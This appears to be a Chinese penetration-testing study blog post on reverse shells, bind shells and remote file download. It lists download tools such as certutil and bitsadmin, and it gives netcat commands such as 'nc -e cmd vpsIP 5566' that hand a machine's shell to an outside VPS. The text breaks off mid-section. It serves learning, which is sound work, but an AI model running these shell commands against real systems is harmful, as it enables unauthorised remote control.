网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

 免责声明

本免责声明适用于作者所有文章内容。使用者需明确,网络安全技术仅供学习和合法研究使用,不得用于任何非法活动,如未经授权的入侵、攻击或数据窃取,所有相关法律责任由使用者自行承担。由于网络安全操作可能带来系统崩溃、数据丢失等风险,使用者应对其操作后果有充分认知,并自行承担任何损失或不良后果。作者和提供者不对因使用这些技术引发的任何损害或法律责任负责,所有资源仅供学习参考,不建议用于生产环境。同时,所有内容遵循公开共享原则,使用者在引用或传播时应遵守相关规定并承担责任。

远程文件下载

我们现在宝塔上安装linux环境并在127.0.0.1中加入自己的公网ip,f68343e8f4be4d35b7e2009ff104d08b.png

 找到nc的官网,将netcat 1.11 for Win32/Win64下载到我们的网站目录下。95b9f12fb58f41a7aff7dd2e4edb937e.png

尝试访问自己的公网IP+文件名。

 348e73dd6f3f4f7b9e1ccf08c174208a.png

 e957b44321a44a1db8919ad2c4846ed1.png

能够进行下载说明可以进行远程文件下载了。

 打开[~]#棱角 ::Edge.Forum* -----》文件下载工具

根据自己的vpsIP、端口和文件名进行填写

可以使用命令进行一键远程下载

3c28294915a346fca8367a1d5c7119be.png

 

#实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

 

直接将上面的命令执行即可。

 

反弹shell

要控制内网的某一台机器的权限

(1)内网机器把自己的命令行给到外网服务器的某个端口,外网服务器进行监听(唯一方法)

(2)如果内网把命令行权限给到本地某个端口,那外网服务器如果要获得权限,那么必须在路由器上做端口转发,也就是端口映射

 

b70ee510d816433bbd56b564b6196cdc.png


89a9e676d5c042d0b200e7c6c3c561a3.png

连接实验

外网机器控制内网机器

只能主动给出去权限,这里不做演示了

内网机器:nc -e cmd vpsIP 5566

外网机器:ncat -lvp 5566

这样就可以让外网机器控制内网机器了。

内网机器控制外网机器

这个只需要外网机器把权限给到本地的5566,然后内网机器去连接

内网机器:nc vpsIP 5566

外网机器:ncat -e /bin/bash -lvp 5566

 

 

正向连接(Forward Connection)

通常指的是客户端主动向服务器发起连接的行为。这种连接模式是网络通信中的常见模式,客户端会通过发送请求来与服务器

评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值